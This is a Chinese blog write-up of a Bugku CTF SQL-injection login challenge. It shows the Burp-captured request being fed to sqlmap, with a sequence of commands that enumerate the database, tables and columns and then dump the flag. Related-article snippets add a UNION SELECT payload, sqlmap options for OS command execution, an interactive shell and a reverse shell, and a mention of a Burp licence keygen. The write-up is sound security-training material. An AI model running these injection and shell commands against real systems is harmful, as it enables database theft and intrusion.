bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)

最新推荐文章于 2023-06-07 15:04:46 发布
最新推荐文章于 2023-06-07 15:04:46 发布
阅读量543 收藏
点赞数
分类专栏: CTF 文章标签: sqlmap配合burp bugku ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43571641/article/details/84639983
版权

题目
http://123.206.87.240:9001/sql/
在这里插入图片描述
随便输入账号密码,然后打开burp进行拦截,并生成该页面的文件,保存到本地

在这里插入图片描述
然后使用sqlmap工具
构造相应语句
首先爆数据库

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name --dbs

在这里插入图片描述

继续爆该数据库下的表

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 --tables

在这里插入图片描述

继续爆相应表的列名

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 -T flag1 --columns

在这里插入图片描述

最后爆出列名内容

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 -T flag1 -C flag1 --dump

在这里插入图片描述

最后得到flag!

Luckysec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python-一个基于burp的反射型xss检测插件
08-12
"Python-一个基于burp的反射型xss检测插件"就是这样一个专为Web安全设计的工具。 Burp Suite是一款强大的网络安全套件,由PortSwigger公司开发,主要用于Web应用的安全测试。它包括许多模块,如拦截代理、扫描器、...
burp-unauth-checker:burpsuite扩展程序,用于检查未经授权的漏洞
04-15
burp-unauth-checker概述自动化检测未授权访问漏洞关于该插件的实现细节,参考快速开始使用时需要勾选launchBurpUnauthChecker,建议在测试需要授权访问的功能时才开启(如网站后台)authParams.cfg:存储授权参数,...
关于用bp和sqlmap工具等做出sql注入一种方法
weixin_43326436的博客
06-08 1463
1.工具 sqlmap,bp 2.步骤 将bp抓到的包的数据,复制到txt文档中,打开sqlmap。 爆库命令:python2 sqlmap.py -r ***.txt --dbs 依次爆表等 例如: python2 sqlmap.py -r 1.txt --dbs python2 sqlmap.py -r 1.txt -D 爆出的库名 --tables python2 sqlmap.py -r 1.txt -D 爆出的酷库名 -T 爆出的表名 --columns python2 sqlmap.py -r
笔记--sqlmap的基本命令
2301_76567007的博客
06-07 463
sqlmap -u “ –smart –dbms “Mysql”–os-cmd=whoami #执行系统命令 sqlmap -u “ –smart –dbms “Mysql”–os-shell #系统交互shell。sqlmap -u “ –smart –dbms “Mysql”–os-pwn #反弹shell sqlmap -u “ –smart –dbms “Mysql”–reg-read #读取win系统注册表。
SQLMAP工具详解
weixin_56218159的博客
06-02 6989
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
sqlmap的安装与使用
qz362228的博客
08-13 9949
sqlmap的安装和使用
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4725
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
burp-copy-as-ffuf:Burp扩展程序,用于复制请求并构建FFUF
05-09
打p扩展名:复制为FFUF 描述 ffuf ( )作为一种快速的便携式网络ffuf ,在Infosec社区中获得了广泛的...也许添加一个简单的用户界面,允许配置单词列表的路径 要求 Python环境/ Jython for Burp Suite 安装 检查Ext
Python-一个Burpsuite插件用于检测隐藏的XSS
08-10
一个Burpsuite插件,用于检测隐藏的XSS
Linux系统设计-sqlmap4burp++是一款兼容Windows,mac,linux多个系统平台的联动插件
最新发布
01-10
Linux系统是一个免费使用和自由传播的类Unix操作系统,基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统。它继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统,Linux是许多企业...
burpsuite插件sqlmap4burp安装包
01-05
已编译,亲测可直接使用,直接用burpsuite抓包,右键选择send to sqlmap4burp ,直接调用sqlmap进行注入点测试
burp-clj:clojure实现burp插件,提供clj脚本加载环境
05-11
burp-clj为burp提供clojure插件支持,提供加载clojure脚本文件的功能Usageburp加载插件后,在Clojure Plugin页面下添加Script Source,比如:然后点Reload Scripts!加载这个目录下的所有clj文件,支持git url和本地...
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。描述此burp扩展有助于识别struts2 Web应用... 一旦加载而没有任何错误,将在现有的burp实例中弹出一个新选项卡。用法只需右键单击所选请求,然后单击“检查S
burp-piper:Piper Burp Suite 扩展插件
05-29
用于 Burp Suite 的 Piper建造执行./gradlew build ,你将在build/libs/burp-piper.jar准备好插件已知的问题当外观设置为Nimbus时,终端仿真器将忽略背景色,请参阅执照整个项目在 GNU 通用公共许可证 v3.0 下可用,...
bugku-Web这是一个神奇登陆(sqlmap+bp)
Sea_Sand息禅
12-12 975
根据url提示是让sql注入,但万能密码又无效,这里我们用sqlmap+bp来解题。 首先输入用户密码来登录用bp抓包: 如图将其保存到txt文件中,然后用SQLmap来注入 输入命令暴库:sqlmap.py -r "1.txt" -p admin_name --dbs(我将1.txt和sqlmap保存在同一个文件夹下了) -p为注入点,就是admin_name ;r为读文件 会发...
这是一个神奇的登录Bugku-web题 使用sqlmap注入实例
热门推荐
Risker
03-14 1万+
正在学习sqlmap,拿这个题先入门一下。题目链接:http://120.24.86.145:9001/sql/先看下源代码:是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)我保存到了D盘的1.txt里。然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" ...
bugku-这是一个神奇登陆(附代码)(详细)
偷一个月亮
06-20 888
题目链接:http://123.206.87.240:9001/sql/ 数据库 表名 列名 select flag 代码 admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GO admin_name=admin" union select (s...
bugku 这是一个神奇的登录
Superpig的博客
11-19 3311
步骤 1、打开题目链接,是一个登录界面,抓包后传数据进行尝试 2、尝试数据 先尝试admin_name=1&admin_passwd=1&submit=GO+GO+GO 得到Try Again! 尝试admin_name=1'&admin_passwd=1&submit=GO+GO+GO 仍然得到Try Again! ,说明 ’ 被过滤了 尝试admin...
给我一个burp-loader-keygen
07-12
burp-loader-keygen是一个用于生成Burp Suite Loader密钥的工具。Burp Suite是一款常用的Web应用程序安全测试工具,而Burp Suite Loader则是一种用于绕过Burp Suite的许可证验证的工具。使用burp-loader-keygen可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值